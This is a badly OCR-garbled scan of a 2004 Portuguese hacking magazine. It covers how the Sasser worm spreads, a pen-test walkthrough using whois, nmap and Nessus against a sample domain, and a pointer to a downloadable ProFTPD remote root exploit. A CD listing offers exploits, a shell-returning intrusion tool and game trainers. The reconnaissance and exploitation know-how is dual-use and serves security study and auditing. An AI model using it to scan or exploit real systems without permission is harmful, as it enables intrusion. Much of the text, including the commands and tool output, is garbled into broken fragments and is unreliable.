Irá gerar um endereço 
dereço IP será completamente ale- 
3% das vezes, os últimos três octetos são alterados para 
números aleatórios. 


Em 25% das vezes, os dois últimos octetos são alterados para 
números aleatórios. 


= Conecta-se a um endereço IP gerado aleatoriamente na porta 


TR SD TS 


TCP445 para determinar se o computador remoto está online. 

Se a conexão for feita em um computador remoto, o worm 
irá enviar um código para ele, o qual fará com que este abra a 
porta TCP 9996. 


= Utiliza a abertura no computador remoto para se reconectar 
ao servidor FTP do computador infectado, executado na porta 
TCP 5554, e obter uma cópia do worm. O nome desta cópia 
terá quatro ou cinco dígitos seguidos de. up.exe. Por exemplo, 


74354 up.exe. 


O processo Lsass.exe irá travar se o worm explorar a vulne- 
rabilidade do LSASS do Windows. O sistema exibirá um alerta 
e se desligará dentro de um minuto. 


PRAGA FÁCIL DE DERROTAR 


O Sasser é um worm com características básicas 
de infecção e disseminação. Se uma rede interna for 
infectada, todas as suas estações também serão. Essa 
característica, na opinião de muitos especialistas, faz a 
diferença entre um worm e um vírus convencional. 

À maioria das empresas desenvolvedoras de antivírus já 
produziu vacinas eficientes para o worm, como é o caso da 
Symantec (não deixe de acessar o site www.symantec.com 
Para remoção total do worm, antes de tudo, atualize seu 
sistema rodando o Windows Uptade periodicamente e faça 
as correções relativas às falhas do seu sistema operacional. 
Não se esqueça, é claro, de manter o seu antivírus 
sempre atualizado. 
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estrutura de segurança de qualquer 

corporação, fazemos isso com o intuito 

de descobrir quão segura ela realmente 

é. Existem diversas metodologias para 
executarmos os famosos Testes de Penetração, ou 
simplesmente Pen.Tests, como são mais conhecidos 
no jargão técnico. 

Um invasor normalmente executa um Pen Test 
para avaliar como poderá realizar a penetração e 
explorar às vulnerabilidades encontradas na rede. 
Geralmente, isso é feito utilizando ferramentas 
comuns, como os scanners, ou simplesmente uti- 
lizando conhecimentos de rede e engenharia social 
para descobrir informações capazes de levar à con- 
cretização da invasão propriamente dita . 


. | TEmemes . 
Neste artigo, mostraremos alguns procedimen- 


tos até chegar a execução do ataque, além de uma 
prova de conceito para conseguir as “chaves de 


as 


acesso” ao sistema que será auditado. Isso mostra 
que informações importantes podem estar bem na 


nossa frente, embora nunca reparemos. 


UTILIZANDO OS RECURSOS DE REDE 


Para descobrir uma informação, ninguém precisa neces- 


sariamente ter um arsenal de ferramentas especializadas. 
Às vezes, o simples conhecimento de TCP/IP e de órgãos 
de informação pode nos ajudar. 

Vamos supor que vamos auditar um cliente que 
possui uma máquina na internet, onde está hospedado 


o domínio. Sabemos que esse domínio está registrado 


! 
) 


como www.tubaraosardinha.com.br e nosso objetivo 


a) 


é descobrir informações referentes ao servidor que 
o hospeda. Ou melhor, se ele está hospedado em um 
webhosting ou na empresa. Ao contrário do que muitos 


po 
ai 


pensam, essa tarefa é simples, e não é necessário con- 
tar com um scanner de última geração, nem dominar 
técnicas avançadas de hacking. 

Podemos utilizar simplesmente o comando 
whois do TCP/IP. Trata-se de um cliente do ser- 
viço de whois que funciona como um serviço de 
pesquisas de domínio, de acordo com a RFC-812. 


ind 


COMANDO WHOIS NO TCP/IP 


4 
ç ) 
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UTILIZANDO OS SCANNERS 
Com posse dos endereços dos j 

formações de maneira 

scanners. Os sc 


amentas de varredura, que são 
classificados s grandes classes: 


AQUI ENCONTRAMOS DUAS 
INFORMAÇÕES IMPORTANTES: 


cional — opção -0). 


Starting nmap 3.50 ( http://www.insecure. 
org/nmap/ ) at 2004-05-30 21:05 UTC 


Interesting ports on localhost 
(127.0.0.1): 

(The 1652 ports scanned but not shown 
below are in state: closed) 


PORT STATE SERVICE 
21/tcp open ftp 
22/tcp open ssh 
37/tcp open time 
79/tcp open finger 
80/tcp open http 


Device type: general purpose 

Running: Linux 2,4.X|2.5.X 

OS details: Linux Kernel 2.4.0 - 2.5.20 
Uptime 5 days (since Sun May 25 
19:16:08 2004) 


em 
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Apuramos que o serverl.tubaraosardinha.com.br é uma má- 

quina Linux que está no ar há cinco dias e que, provavelmente, 

em o Kernel 2.4. O mais importante são as portas abertas que 

onsultar; como: ftp, ssh, etc. Nesse ponto, o leitor 

deve do: “Para descobrir qual é a versão dos sof- 
twares instalads 

e descobrir”. Cuidado! 


escondendo o banner de res 


aner, basta eu dar um telnet na porta 
ale hoje, muitos admins já estão 
os serviços, editando o 


código-fonte, ou então utilizando hô Calma que falare- 


rodando aqui, 


mos disso mais à frente. Como temos a P6 
pode ser que a página Web esteja hospedada: s repetir 


o mesmo procedimento com o server2. 


B) Scanner de vulnerabilidades: utilizado para a detecçã 
de vulnerabilidades em softwares que estão sendo executados 
em um sistema. O mais interessante e completo é o Nessus, 
que pode ser baixado do site http://www.nessus.org. O Nessus 
como scanner de vulnerabilidades é perfeito para a execução de 
um segundo nível de Pen Test. Basicamente, depois de instalar- 
mos o software, podemos escolher uma série de testes a serem 
executados em nosso alvo. 


HANNA 


4 Enable dependencies at runtime 


| 
| 
| Es auf Enable all but dangerous plugins| Disable a eo plugin..| 
| 
| 


| NS , 


É possível selecionar os testes que serão feitos contra o nosso 
alvo e com o Nessus, além de obter uma série de informações 
sobre o servidor. Cuidado com o Nessus, pois certos testes po- 
dem paralisar a máquina a ser investigada. Depois de realizar os 
testes, temos o relatório abaixo: 


f 
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Temos aqui um perigosíssimo furo de segurança. À versão de 
PROFTPD está com um bug que permite executarmos um bu- 
fefroverflow remoto na máquina auditada. O que significa isso? 
Acesso remoto com elevação de privilégios para root. Resumindo: 
a máquina pode ser tomada por um invasor. 


PROVA DE CONCEITO 

Você pode baixar o exploit do buffer overflow remoto aces- 
sando a página: http://www.web-hack.ru/exploit/source/ 
proftpdr0Ot.c, compilá-lo e testá-lo em um sistema vulnerável. 
Só que será preciso fazer pequenas alterações no código. 


PASSIVE FINGERPRINTING 

Às vezes, é melhor ocultarmos a nossa presença numa tenta- 
tiva de varredura. Para isso, utilizamos uma técnica conhecida 
como Identificação Passiva (Tradução livre), que usa várias in- 
formações do protocolo TCP/IP. A identificação passiva pode ser 
utilizada por vários métodos distintos, sendo que sua ferramenta 
mais representativa é o POF. 

O POF é um scanner passivo capaz de analisar conexões 
SYN+ACK e RST, possibilitando ouvir o dispositivo, identifi- 
cando e examinando as falhas do protocolo. O software pode 
ser obtido em http://lcamtuf.coredump.cx/pOf.shtml. Uma 
outra técnica muito interessante é o icmp scanning. Através da 
análise do cabeçalho do protocolo icmp, podemos verificar que 
cada sistema operacional tem um comportamento diferente no 
que diz respeito à sua resposta. 

E Por exemplo, o Payload de um Windows ME normalmente é 
O. Já em um Linux com o Kernel 2.4 é 8. Isso significa que basta 
/ analisar cabeçalho icmp para que possamos determinar o siste- 
ma operacional que está sendo executado. Entretanto, alguns 


honeypots podem trabalhar em nível da Stack e gerar respostas . ..-" 
falsas, que manipulam esses resultados. 

Existem ainda outras metodologias de Pen Test, que pode- 
mos fazer em nível local, mas caracterizaríamos uma análise 
forense de uma máquina comprometida. Existe um excele 
link com muitas ferramentas, o http://www.atstake. 
research/tools/forensic/, além do Sleuthkit (http; 
sleuthkit.org/sleuthkit/download.php). Também é 
outra excelente ferramenta, a FIRE (http://bia 
com/?section=main), que é uma distro Lip 
voltada para a área forense e de Pen Tests 
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Iguns anos atrás, mais exatamente em 18 março 
de 1995, os pesquisadores Dan Farmer & Wiet- 
se Venema disponibilizaram para download o 
progfama SATAN (Security Administrator's 
Tool for Analyzing Networks ou Ferramenta do 
Administrador de Segurança para Análise de Redes, que ainda 
pode ser baixado pela URL http://www.trouble.org/"zen/ 
satan). Tratava-se do primeiro scanner que permitia a análise 
de uma rede local ou remota, além de verificar o status de 
segurança, levantando suas possíveis vulnerabilidades. 

Para os padrões da época, o SATAN causou polêmica 
entre os administradores de networks, pois fornecia re- 
cursos que colocavam em risco a segurança de redes, tais 
como arquivos NFS exportados para programas sem a 
devida permissão, acesso a arquivos de password a partir 
de hosts arbitrários. PRE 
Muita coisa mudou daquela época para cá. Hoje em dia, os 
scanners são considerados ferramentas fundamentais na 
segurança de redes, principalmente quando falamos dos 
scanners de vulnerabilidades e os seus detectores, como 
o Nessus e o Snort. 

Para se ter uma idéia, o SATAN não possuía uma GUI própria, 
sendo que a interface de um browser era usada como frontend. 
A seguir, podemos ver a tela do programa : 


SATAN Control Panel 
(Security Administrator Tool for Analyzing Networks) 


O SATAN Data Management 
SSATAN Target selection 
9 SATAN Reporting & Data Analysis 


Caso você tenha curiosidade de instalar esse scanner (sim, 
isso ainda é possível), siga estes passos: 


e em primeiro lugar, você deve baixar um pacote compilado 
do repositório Debian. Para isso, basta acessar o endereço 
http://ftp.debian.org/debian/pool/non-free/s/satan/sa- 
tan 1.1.1-18 ;386.deb 


e converta para o formato nativo do Slackware usando o alien: 


alien -t satan 1.1.1-18 i386.deb 


* agora é hora de instalá-lo na sua máquina a partir do ar- 
quivo: installpkg satan-1.1.1.tgz 


e crie um link simbólico para o Netscape (esta versão compi- 
lada do Satan tem como frontend default este navegador): 
In -s /usr/bin/netscape /usr/bin/X11/netscape 


e chamamos o programa (como root): 
satan & 


Mas tudo isso é passado. Hoje o SATAN é o avô dos scanners 
de vulnerabilidades modernos (como os que investigaremos). 
Neste tutorial, apresentaremos um review sobre scanners, 
explicando passo a passo como instalá-los e configurá-los. Para 
completar, demonstramos alguns casos concretos de testes fei- 
tos pela nossa equipe numa máquina rodando Slackware 9.1. 


RESUMO TEÓRICO IMPORTANTE 


Antes de tudo, o que é uma porta no computador? Trata-se -=' 


de canais, virtuais ou não, que permitem ao micro comunicar- 
se com outros computadores remotos. 

Pela definição, os processos de comunicação (os daemons) 
utilizam-se das portas, que são identificadas através de 
números padronizados. Dentre as mais conhecidas, temos: 

Serviço 
www-http 
ftp-data 
ftp 

finger 

sftp 


Para uma lista abrangente, sugerimos que você acesse o 
seguinte link: http://www.iss.net/security center/advi- 
ce/Exploits/Ports/default.htm. 


Por serem canais de comunicação utilizados por processos, 
obviamente eles podem ser acessados por alguma pessoa 
mal-intencionada. Por isso, vemos a necessidade de utilizar 
programas que analisem a situação das portas que estejam 
disponíveis num dado computador. Se elas estiverem pro- 
tegidas adequadamente, os scanners de vulnerabilidades 
fazem exatamente isso: 
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Um scanner é um programa que varre as portas numa má- 
quina-alvo (ou de um conjunto de máquinas de uma rede) 
em busca de vulnerabilidades. 


FACA DE DOIS GUMES 


Já diziam os sábios: “uma faca não é boa ou má. Pode-se usar 
uma faca para cortar alimentos ou assassinar um ser humano. 
A responsabilidade não é da faca, mas de quem a empunha”. 
O mesmo podemos dizer em relação aos scanners: é uma 
excelente ferramenta nas mãos de um administrador de redes 
zeloso, ou pode se tornar uma arma perigosa quando usada por 
um invasor de sistemas. Dig 
Voltando ao nosso tutorial propriamente dito, vamos apre- 
sentar alguns scanners. Agora faremos a instalação, a con- 
figuração e os testes concretos. 


NMAP 


Obra-prima do H4CK3R Fiodor, considerado o mais po- 
deroso dos scanners de linha de comando, o nmap verifica 
que máquinas estão ativas numa rede alvo e que serviços (as 
portas!) estão acessíveis. 

Várias técnicas de scan são suportadas pelo nmap, tais 
como TCP connect, TCP syn, ftp proxy, ICMP, etc. Além disso, 
ele faz a detecção remota do SO da máquina-alvo através da 
técnica de TCP/IP fingerprinting, stealth scanning, scanning 
paralelo, dentre muitas outras opções. 

Para criar um e-book em PDF do manual do nmap (nossa 
referência básica!), abra um terminal e digite: 


man2dvi nmap > nmap manual.dvi 
| dvipdfm nmap. manual.dvi 


Obs: E necessário ter os pacotes de desenvolvimento latex ins- 


talados na sua máquina para que esses comandos funcionem. 
USANDO O NMAP 

Mude seu status de usuário para root e digite: 

nmap 


Uma tela do seguinte tipo será retornada: 


= EtT= 
e + en 
“e” eottere regiire rege prtuliages) 
(aefmle (F privtlegeá (rost)) 
mean (default fer urprivilegas úsera) 


nn Crer al tato gol 

Ido: contins resete)” 

opala scam Log to Clogfiies 
for tir 


Em vez de comentar cada opção disponível nas chaves, va- 
mos mostrar exemplos concretos de scanning seguidos dos 
comentários associados: 


EXEMPLO 1: 


nmap -v -sS T 5 192.168.1.N0 


[eractino rezo 3.45 ( http://uas insacira er/rasp/ ) ae 2004-05-21 15:00 2eT 
to de ip 


et 182.168.1.110 appears es Soo 
instiatirg SAN Stealth Scam contrai 132.358.1,110 ot 16:50 
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COMENTANDO O QUE FOI FEITO E OS RESULTADOS 


º -v : modo verbose, padrão do mundo Unix, para que os 
resultados sejam impressos na tela (modo interativo). 


e -sS: TCP syn scan, também conhecida como “half open” 
scanning, pois não abre uma conexão TCP completa (todas as 
portas NÃO são escaneadas). No próximo exemplo, faremos 
um scanning usando uma conexão completa. O interessante 
desta opção é a haixa probabilidade de que o sistema alvo es- 
creva um log sobre o seu scan, mas precisamos estar logados 
como root para utilizá-la. 


e T 5: aqui setamos o nível do scanning, sendo que a escolha 
“5” é o nível “ 


insano”. Devemos observar que, quanto mais 


“agressivo” for o ataque, mais tempo demandará para que 
o scan seja realizado (time policy). 


resultados: dentre as portas escaneadas, vemos que as “inte- 
ressantes” são ftp, ssh, smtp, time, finger, auth, netbio-ssn, 
microsoft- ds, ipp e mysql. 


EXEMPLO 2: 


nmap -v -sT -O -T 5 192.168.1.10 
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COMENTÁRIOS E RESULTADOS 
Em relação ao exemplo anterior, temos duas diferenças: 


s-O: esta opção diz ao nmap para que identifique o SO que 
está rodando na máquina alvo. 


e -sT: TCP connect( ) scan; aqui setamos um scanning com- 
pleto (todas as portas). Mas a porta só será alcançada se 
estiver no estado de “escuta” (listening). A vantagem dessa 
opção é que não é preciso estar logado como root, mas por 
outro lado, podemos ser facilmente detectados pelo log da 
máquina-alvo. 


resultados: as mesmas portas foram detectadas como “inte- 
ressantes” (é claro), mas temos a informação adicional de qual 
SO está rodando na mágquina-alvo. Trata-se de um Linux com 
kernel 2.4.*. E v nmap ainda deseja uma “boa sorte”...=) 


EXEMPLO 3: 


nmap -v -sV -O -T 5 192.168.1.10 


| 


Cem 


TE 


EE 
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e -sV: usamos esta opção para que o nmap teste as portas 
abertas procurando determinar o serviço e os aplicativos que 
estão rodando nas mesmas. 


resultados: vemos claramente pela imagem acima que foram -” 


geradas afirmações adicionais, pois alguns dos aplicativos que 
estão usando as portas foram reconhecidos (ident - OpenBSD 
ident, por exemplo). 


NESSUS 


O Nessus (http://www.nessus.org) é atualmente um dos 
mais famosos scanners de vulnerabilidades. Para os aficio- 
nados em interfaces gráficas, o aparelho é bem agradável e a 
GUI foi feita em GTK. Há muitos recursos no Nessus. Confira 
alguns deles: 


e Arquitetura de plug-in: os testes são tratados como um plug-in 
externo; trata-se de uma camada de abstração que permite ao 
usuário adicionar seus próprios testes sem ter a necessidade de 
conhecer a estrutura interna do engine do Nessus. 


e NASL: significa “Nessus Attack Scripting language”, ou 
seja, é uma linguagem interna do Nessus usada para escrever 
scripts de testes de segurança. Mas o Nessus também suporta 
a linguagem C. 


e Arquitetura cliente-servidor: o Nessus é formado por duas 
partes: um servidor, que realiza as varreduras, e um cliente 
como frontend (interface de vanguarda). A dupla cliente/ser- 
vidor pode ser rodada em sistemas distintos. Por exemplo, 
o cliente pode estar realizando uma auditoria na sua própria 


máquina, enquanto o servidor varre um host remoto. 
Para uma lista completa dos recursos disponíveis, acesse: 
http://www.nessus.org/features.html. 


INSTALANDO O NESSUS 

Copie o arquivo nessus-installer.sh (contido no CD desta edi- 
ção da H4CK3R) para o diretório do seu gosto e dê permissão 
de execução ao arquivo: 


chmod +x nessus-installer.sh 


Após executá-lo: 
./nessus-installer.sh 


Surgirá uma imagem do seguinte tipo (dependendo do ter- 
minal usado, é claro): 


ás script will ínstall Nessus 2,0,10a (STABLE) on your system, 


ease note that vou will need root privileges at some point so that 
e installation can complete, 


is is released under the version 2 cf the GNU General Public License 
(see httpz//4mu gru org/Ticences/cpl .htal for details). 


o get. the Iatest version of Nessus, visit http://wuy.nessus.ora 
aaa, 


5 ve need to switch between being root or not automatically, 
E uill create a suid shell in "/twp/nessus-installer,3134"/su 
E ; 1 


access "/tnp/nessus-installer, 3134", 
Éider that as a risk. 


do not want to do this, hit Ctrl£. 


EMIER to continue, ,. 


root, um arquivo temporário será criado em 
[tmp/nessus-installer.3134, o qual será removido após a ins- 
talação. O script também informa que só você poderá acessar 
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Delete session 


[+ rm -£ 4usn/local/bin/nessus-akcert-client 
[+ rm -f /usr/local/sbin/nessus-adduser 
[+ rm =f /usr/local/sbin/nessus-rauser 


[+ rm -f “/usr/local/lib/libhosts. 
[eRem E "/usr/local/11b/Libnas].** 


rm £ “fusr/local/lib/libpoap-nessus.*! 
rm rf /usr/local/lib/nessus 


Diretórios são manipulados e compilações são realizadas. 


) 


atitio 


figura acima, além dos paths para os arquivos de configuração 3 
relevantes. 


(Congratulations | Nessus is-now installed on this host 


|» Create a ressusd certiPicate using /usr/local/sbin/nessus-akcert 
- Add a nessusd user use /usr/local/obin/nessus-adduser 

- Start the Nessus daemon (nessusd) use /usr/local/sbin/nessusd -D 
- Start, the Nossus client (neseus) use /usr/local/bin/nessus 

- To untnstall Nessus, use /usr/local/sbin/uninstalI-nessus 


Renenber to invoks “nezsus-update-plugins* pertodicallu to update your 
list of plugins a 


b) Adicionando um usuário 


É o próximo passo a ser tomado. Mude seu status de usuário 
para root e digite: 


perto bica odiado : nessus-adduser 


ses ENTER to quit 


Comisso, informações serão requisitadas para criar o usuário, 
como podemos ver na figura abaixo: 


A instalação foi finalizada. Esta imagem capturada informa os 
passos da configuração - é o que faremos agora: 


a) Criando um certificado para o Nessus 


Mude o seu status de usuário para root e rode o seguinte script: 
sd has a rules system which allows you to restrict the hosts 
yusuke has the right to test, For instance, you may vant 

fim to be able to scan his om host only. 

nessus-mkcert 


Bilease ses the nessus-adduser(8) nan page for the rules suntax 


E santa á E Pinter the rules for this user, and hit ctrl-D once you are done * 
Vejamos a segiiência de imagens associada: the user can have anmenpty rules set) 


— xtem 


Creation of the Nessus SSL Certificate 


Note que as informações usuais são requisitadas: nome e 
autenticação (senha/certificação). Como optamos por uma 
senha, devemos fornecê-la. Ao final, o aplicativo pergunta 


| This script will now ask you the relevant information to create the SSL 
Ecertificato of Nessus, Note that this information will *NOT* be sent to 
anubody (everything staus local), but anyone uith the ability to connect to your 
ENessus daemon uíll be able to retrieve this information, 


se você deseja entrar com regras restritivas quanto aos alvos 
que o usuário (no nosso caso, o “yusuke”) pode escanear. 
Não fornecemos nenhuma, assim o yusuke pode escanear o 
que quiser...;-) 


E Your state or province name [none]: sao. paulo 
| Your location (e.g. town) [Paris]; são paulo 


O script começa a requisitar informações para criar um 
certificado SSL (Secure Sockets Layer = Camada de sockets 
seguros): prazo de validade do certificado CA, certificado para 
o servidor, dados locais (país, estado e cidade) ea organização. 
Nossas escolhas estão ilustradas na figura acima. 


(that yusuke has the right to test, For instance, you may want 
lhin to be able to scan his ow host only, 


Please see the nessus-adduser(8) man pase for the rules suntax 


Enter the rules for this user, and hit ctrl-D once you are done ; 
(the user can have en enpty rules set) 


a SSL Cortificato 


Your server certificoto vas properly crested. 


nf updated 


Cortáfication authors tu 
Cortificato ="/uar/lotal/com/neseus/CR/cacert.pom 
Pravato koy = /usr/iocal/090/nosese/CA/ Caio po 


-pem 
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C) Testes de scanning usando o Nessus 
Como root, carregue o daemon do Nessus em background, 
ou seja: 


[E 


| Er ep ny cam 


nessusd -D & - 


E, agora, como usuário comum, chame o Nessus: 


nessus & 


Setamos algumas opções de scan, como intervalo das portas a 
A interface que vai surgir é a que segue: serem escaneadas, otimização de testes, testes seguros, etc. 


1921681110 


—J Pertorm a DNS zone transfer. 


Read file... 


à E aqui, como se vê, fixamos um IP interno da nossa rede local. 
Agui logamos como usuário yusuke. Agora vamos configurar Vejaa seguir os resultados obtidos: 
vários recursos: ! 


a mto pt te retas TCS pts 
no E Sagem 


Ogg en e gre po st an 
echo ay te se Bi Espa ne 


A ue aro rap nach comcievetograg 2010024 nl 
pato copas 


“Sa - Catat yo vedee ne a pas 
Rc 


Neste passo da configuração, vemos os plug-ins disponíveis. 
Inicialmente, desabilitamos todos os plug-ins, deixando ape- 
nas os de rpc e firewalls ativados. 
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Os relatórios gerados pelo Nessus mostram que, de acordo 
Neste passo, setamos algumas preferências, tais como o comas opções de teste setadas, os riscos de segurança en- 
modo de scan(UDP), pingar o host remoto, etc. contrados são de nível médio e baixo. 
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dos filmes/protestos de Michael Moore, para rodar o mundo e fazer 
com que as pessoas sentirem medo ao pedir um McLanche Feliz. 
As alterações na saúde de Morgan são O desfecho perfeito para 
a antipropaganda. Acompanhado por três médicos, ele descobriu 
que, no final de toda essa comilança, ele ganhou aproximadamente 
2 quilos, seu colesterol subiu 65 pontos e seu fígado ficou em es- 
tado precário. Foi um verdadeiro 
A DoS de gordura, mas o docu- 
mentário tem um tom bem-hu- 
morado e educativo até certo 
ponto. Se você quer fazer um 
regime, não deixe de assistir o 
Super Size Me. 
www.supersizeme.com 


“REALMENTE 
ARTIFICIAL 
A Meachinima.com lança o DVD de um clássico da ficção científica, 
o Killer Robot. O filme, feito inteiramente no 3DGamemaker por 
Peter Rasmussen, da Nanoflix, conta a história de três robôs que 
vivem na superfície de Marte. A animação deixa a desejar (sem 
detalhes e expressões humanas), sendo acrescida de um deta- 
lhe importante, que faz toda a diferença: o software “Festiva”, 
desenvolvido na Universidade de Edinburgo, que produz vozes 
sintetizadas, tornando os diálogos entre os personagens Sam, 
Mira e Cato distantes de qualquer outra coisa que você já ouviu. 
Para completar, a história também não deixa por menos. A trama 
«e desenrola quando Cato fica louco e deseja matar a tripulação 
de humanos que está chegando ao planeta vermelho. Sam e Mira 
tentam impedi-lo. 
Killer Robot 
Preço: USS 22 + envio ou download gratuito em: 
www.zipworld.com.au/“raz/nima/nima.html 
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Essa não apenas mais uma distro. Linux voltada para se- 
gurança. Além de ser um Live-CD, o “packet” vem com mais 
de 200 pacotes com ferramentas de elite para escanear vul- 


nerabilidades, realizar testes de penetração, e fazer análises 
forenses. O projeto foi desenvolvido sob a licença GNU/GPL 
e foi programado do zero usando C/ C++, Perl e Phyton. Seu 
foco está principalmente na criptografia e no uso de firewalls. 
No CD desta edição há um ISO do Packet Master e para saber 
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, VOCÊ entra no mundo do war- 
Iking com o pé direito. Disponível 
no CD desta edição e também em 
www.kismetwireless.net 
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Com este livro, mesmo sem saber nada sobre lógica de progra 
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Partir de uma análise histórica da revolu ção 
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iição, é possível compreender a linguagem C++ agenda a picos 

é para se aperfeiçoar. Ele ensina do básico até a aplicação profissio- 

- nal, explicando linha por linha o programa utilizado como exemplo. 
Inclui os últimos acréscimos e a nova biblioteca padrão C++ ANSI/ 

ISSO, assim como biblioteca de gabaritos STL, projetos seua 

Arrays e Strings. Seus tópicos são separados Fe classes, objetos, 

encapsulamento e polimorfismo, facilitando a leitura e a compre- 
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The Matrix Online 
Plat, 


esta edição você encontra uma 
distribuição Linux própria para 


| proteção e segurança de redes, o 
| The Packet Máster Linux. Além 
Hbstes recursos este Linux contém um pacote 
| para análise forense digital. Confira também Vácements 


1! Lima seleção especial de programas para au- E 
ditoria de redes e testes de vulnerabilidades Senciais e 
'na categoria Pen Test (penetration test). 
| Não acaba por aí, são mais de 25 exploits, 

rogramas para segurança e auditoria de 
edes VPN, Trainers, que nada mais são que 
op para trapaças em jogos. 


48 hacker 
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LINUX 
THE PACKET MASTER LINUX SE- 
CURITY SERVER - Distribuição Live 
Security e forense, construída do zero 
e finalizada em um pacote completo de 
ferramentas para análise de vulnerabili- 


e análises forenses. 

No CD você encontra o pacote ISO, 
basta gravar a imagem direto para um 
CD-ROM. Como é uma distribuição 

Live, o The Packet Master Linux poderá 
ser executado direto do CD-ROM, com 
o qual você poderá acessar todas as 
funções e recursos do sistema, casb-sejá 
necessário pode-se instalar o sistema. 


PEN TEST 

NMAP 3.50 - Um dos melhores e mais 

famosos network scanners conhecidos. 

O Nmap, ao longo dos anos, firmou-se 

como ferramenta indispensável tanto para 
de pacotes em tráfego, quanto 


e filtros/firewalls 


estão em uso pelo hos nas de 
outras características, ou seja, eu 
software que todo administrador 
redes deve ter ou pelo menos conhece 
sua aplicação. 

NESSUS 2,0 - Poderoso e completo 
scanner remoto de segurança, o Nessus 
tem como vantagem sua gigantesca lista 
de plug-ins, que interage com o scanner 
que, além de escanear um determinad 
host procura dos serviços ofe 


o anúncio oficial de tal, caso a mesma seja 
encontrada em qualquer um dos serviços 
disponíveis no host em questão. Basica- 
mente seu trabalho é escanear uma deter- 
minada rede e lhe retornar onde supostos 
ataques podem ser aplicados 


dades, testes de penetração (pen tests) | 


à o hitptunnel. Isso pode também 


| SETIGDHome através dos SOCKS 
| WINSCP - Cliente de SFTP e de SCP para 


WELLENREITER WIRELESS PENE- 
TRATION TOOL - O Wellenreiter é uma 
ferramenta de descoberta e auditoria de 


“redes wireless 802.11b. Suporta cards 


baseadas em Prism2, Lucent e Cisco. À 
criancinha pode descobrir redes (BBS/ 
IBSS) e detectar broadcastings ESSID 

ou redes não-broadcasting e as devidas 
capacidades de suas WEP e fabricante. 
Tráficos DHCP e ARP são decodificados 
e mostrados, oferecendo-lhe informa- 
ções avançadas sobre as redes. Com 

um dispositivo GPS e o gpsd, você pode 
rastrear a localidade das redes descober- 
tas. Neste pacote, você encontrará duas 
versão do programa, uma em Perl/GTK 
ou em C++ 

REMOTE ACCESS SESSION - Fer- 
ramenta que analisa a integridade de 
sistemas. O Remote Access tenta ganhar 
acesso ao sistema, usando as mais 
avançadas técnicas de intrusão remota. 
Existe uma grande diferença entre o Re- 
mote Acess Session e outras ferramen- 
tas de auditoria de segurança remota. Se 
ele econtra uma falha que retorna uma 
conta ou root, ele tentará explorar tal 
lha e retornará um shell 


SOCKETS 

de comunicação 
CKS. Com o SSH e o RE 
um VPN mais eficiente d 


LS (LINUX) - Túnel 
proxy dos SO- 


O fornece 


usado para aplicações running tais EM 


Windows, usando SSH. A função principal 
é copiar arquivos seguros entre o local 

e um computador remoto. Além desa 
função básica, o programa controla outras 
ações com arquivos 

GATEPROJECT - Firewall e sistema de 
VPN com regras e conexões que podem 
ser definidas pelo (drag-and-drop) da 
interface do usuário. Sua funcionalidade é 
compatível com todas soluções restantes 


nofigáciulo Nuke Jokes do PHP-Nuke 
EM , 


PNISECURITY W 


— 


de VPN, incluindo o ponto de verificação 
NEST 2.0 (LINUX) - Túnel seguro do 
IP VPN, Conecta duas LANs sobre uma 
WAN insegura. A hierarquia trabalha no 
nível do pacote de IP. As características 
incluem a autenticação de pacotes e a 
integridade que verifica criptografia e 
modalidade chave de 160-bit CBC 


EXPLOITS 

LINKSYS DHCP EXPLOIT - Explo- 
re diversas falhas na maneira como 
roteadores Linksys retornam BOOTP 
packets. A cada resposta legítima os 
campos BOOTP são recheados com 
porções de memória do dispositivo, 
permitindo um sniff no tráfego e cra- 
shes no dispositivo 

AUXPLOIT - Ferramenta de explo- 
ração remota para vulnerabilidade do 
cilaux e é capaz de travar por completo 
um cliente de e-mail. O Outlook e ou- 
tros clientes baseados em win32 lêem a 
mensagem usando o IE, que é sensível 
a essa vulnerabilidade 

NUKE JOKES - Artigo demonstrando 
vulnerabilidades de path disclosure, 
cross site scripting e SQL injection Ê 


Obs.: artigo escrito em inglê 


SPARTAN - Tenha imaisi 
movimento ilimitado, bis 


WARS AND WARRIORS: JOAN OF 
ARC - Retornar ao começo, poder ilimita- 
do, pontos infinitos, ouro, minas ilimita- 
das, entre outras caracteristicas 

REEL DEAL SLOTS 2:- Comece com 
muito dinheiro e muitos pontos 
SPLINTERS CELL PANDORA TOMOR- 
ROW - Torne-se imortal, invisível, mais 
veloz, impeça o ataque dos inimigos, 
entre outras vantagens 

BATTLEFIELD 1942 - Habilita o accu- 
racy, speed hack, fog hack e wall hack 
CALL OF DUTTY - Trainer que lhe dá 
vida infinita, munição infinita e também 
permite voltar para o início 

ALONE IN THE DARK 4 - Imortalidade 
e munição ilimitadalsão as vantagens que 
este trainer.lhe oferece 

CAMPAIGN ECKMUHL V1.06A - Voltas 
ilimitadas, movimento ilimitado, não se 


cansar e voltar para início são as caractes 


rísticas deste trainer : 
CIVIL WAR BATTLES: CAMPAIGN: 
FRANKLIN V1.02 - Permitelevar vanta- 
gens no jogo com movimento ilimitado, 
não sentir as consegiiências do esforço, 
"voltas ilimitadasie retornar ao início 
SINGLES: FLIRT UP YOUR LIFE VL.O 
- Ter muito dinheiro, voltar ao começo, 
passar para o próximo nível são algumas 
dás opções deste trainer 
SQUAD BATTLES: ADVANCE OF THE 
REICH V11 - Tenha movimento ilimitado, 
sem limite de voltas e volte ao normal 
NAVAL CAMPAIGN: GUADALCANAL 
- Permite que você ajuste o resultado para 
favorecer quem quiser, diminuir os danos 
nos navios e retornar ao início 
SHANGAI STREET RACER VI.O - Tenha tem- 
po infinito e fique sempre na primeira posição 
THE ALAMO V1.0 - Fontes ilimitadas e 
contingente da tropa 
PANZER CAMPAIGNS 6 KORSUN “44 
V1.03 - Movimento ilimitado, poupar 
esforço, voltas ilimitadas e retornar ao 
modo normal 


também mode God 


NEMESIS OF THE ROMAN EMPIRE 

- Tenha comida e dinheiro quando 
quiser, entre outras vantagens que o 
trainer lhe dá no jogo 

MANHUNT - Permite habilitar e desa- 
bilitar o debugmenu 

HITMAN: CONTRACTS - Fornece as 
opções de munição ilimitada, ficar invi- 
sível, cheat menu e ser poderoso 
BREED - Tenha munição a hora que 
você quiser 

UNREAL TOURNAMENT 2004 - Per- 
mite que você possa voltar ao começo e 


DISASSEMBLERS * 
HACKMAN DISASSEMBLER 8.02 


reze mudanças em 


/ áveis e binários. Possui 
divêrsas ferramentas como disassenábler 
para auxiliar nessa tarefa.É recômendado 
ser utilizado por programadores com 
conhecimento em linguagem de baixo e 
médio nível como Assembler e C. Funcio- 
na em processadores da Intel (x16/x32) 
DJ JAVA DECOMPILER 3.5 - Decompila- 
dor Java que reconstrói o código original 
